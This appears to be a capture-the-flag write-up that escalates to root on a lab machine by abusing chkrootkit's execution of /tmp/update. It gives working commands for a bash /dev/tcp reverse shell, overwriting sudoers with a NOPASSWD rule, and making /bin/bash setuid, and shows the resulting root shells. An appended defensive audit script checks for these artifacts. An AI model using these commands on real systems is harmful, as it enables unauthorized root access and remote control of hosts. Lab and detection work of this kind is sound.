Chkrootkit Exploit

I ran pspy and could see chkrootkit being executed.

Let's search for the exploit.

As per this exploit, chkrootkit will execute any file named "update" that exists under /tmp, so we create one there.

amrois@nineveh:/tmp$ printf '#!/bin/sh\n' > update
amrois@nineveh:/tmp$ printf '/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.9/5555 0<&1"\n' >> update
amrois@nineveh:/tmp$ chmod +x update 

Or you can use a heredoc (EOF) in place of the printf commands, like below:

cat > /tmp/update << EOF
#!/bin/sh
/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.3/5555 0<&1"
touch /tmp/done1
EOF
chmod +x /tmp/update

Once the update file is run, it creates another file called "done1". This confirms that the cron job actually ran.

cat update
#!/bin/sh
/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.3/5555 0<&1"
touch /tmp/done1
ls
done
done1
f
systemd-private-ba77cd94f86e45d0af4d9efa97684ddf-systemd-timesyncd.service-afK3Yj
update
vmware-root

Once the chkrootkit cron job runs, we get a reverse shell:

└─$ rlwrap nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 49824

whoami
root
pwd
/root

Other method: add the existing user to sudoers to escalate privileges

amrois@nineveh:/tmp$ echo 'echo "amrois ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > update
amrois@nineveh:/tmp$ chmod +x update
amrois@nineveh:/tmp$ sudo bash
root@nineveh:/tmp# whoami
root
root@nineveh:/tmp#

You can also set the SUID bit on /bin/bash

Use the below content for /tmp/update:

cat > /tmp/update << EOF
#!/bin/bash

chmod +s /bin/bash
touch /tmp/done3
EOF
chmod +x /tmp/update

It creates the file "done3" after the script has run. To get a privileged shell, run "bash -p -i".

ls -l
total 12
-rw-r--r-- 1 root     root        0 Mar 19 19:56 done
-rw-r--r-- 1 root     root        0 Mar 19 20:58 done1
-rw-r--r-- 1 root     root        0 Mar 19 21:00 done3
prw-r--r-- 1 www-data www-data    0 Mar 19 21:00 f
drwx------ 3 root     root     4096 Mar 18 19:56 systemd-private-ba77cd94f86e45d0af4d9efa97684ddf-systemd-timesyncd.service-afK3Yj
-rwxr-xr-x 1 www-data www-data   49 Mar 19 20:58 update
drwx------ 2 root     root     4096 Mar 18 19:56 vmware-root
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jun 24  2016 /bin/bash
bash-4.3$

whoami
www-data
bash -p
whoami
root
bash-4.3#
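As an added example that is not part of this writeup, the following POSIX shell audit checks a host for the three artifacts the methods above leave behind: an update file in /tmp, a setuid /bin/bash, and a NOPASSWD rule in sudoers. The default paths (/tmp, /bin/bash, /etc/sudoers) are assumptions; each function takes a path argument so it can be run against a test directory.

```shell
#!/bin/sh
# Added audit example, not from the original writeup. Each check returns 1
# when it raises an alert and 0 when the artifact is absent.

# Any file named "update" in /tmp is suspicious on a host running chkrootkit,
# since a vulnerable version executes it as root from the cron job.
check_tmp_update() {
    f="${1:-/tmp}/update"
    if [ -e "$f" ]; then
        printf 'ALERT: %s present: %s\n' "$f" "$(ls -ld "$f")"
        return 1
    fi
    return 0
}
# A setuid shell lets any local user run "bash -p" as its owner.
check_suid_shell() {
    sh_path="${1:-/bin/bash}"
    if [ -u "$sh_path" ]; then
        printf 'ALERT: setuid bit on %s: %s\n' "$sh_path" "$(ls -l "$sh_path")"
        return 1
    fi
    return 0
}
# Flags uncommented NOPASSWD rules in a sudoers file. An unreadable file
# (normal for a non-root auditor) is reported and skipped.
check_sudoers_nopasswd() {
    sudoers="${1:-/etc/sudoers}"
    if [ ! -r "$sudoers" ]; then
        printf 'INFO: %s not readable, skipping\n' "$sudoers"
        return 0
    fi
    if grep -n '^[^#]*NOPASSWD' "$sudoers"; then
        printf 'ALERT: NOPASSWD rule(s) in %s\n' "$sudoers"
        return 1
    fi
    return 0
}
# Runs all three checks against the live defaults; returns the alert count.
run_audit() {
    alerts=0
    check_tmp_update /tmp || alerts=$((alerts + 1))
    check_suid_shell /bin/bash || alerts=$((alerts + 1))
    check_sudoers_nopasswd /etc/sudoers || alerts=$((alerts + 1))
    printf '%d alert(s)\n' "$alerts"
    return "$alerts"
}
# Usage: sh audit.sh --run
if [ "${1:-}" = "--run" ]; then run_audit; fi
```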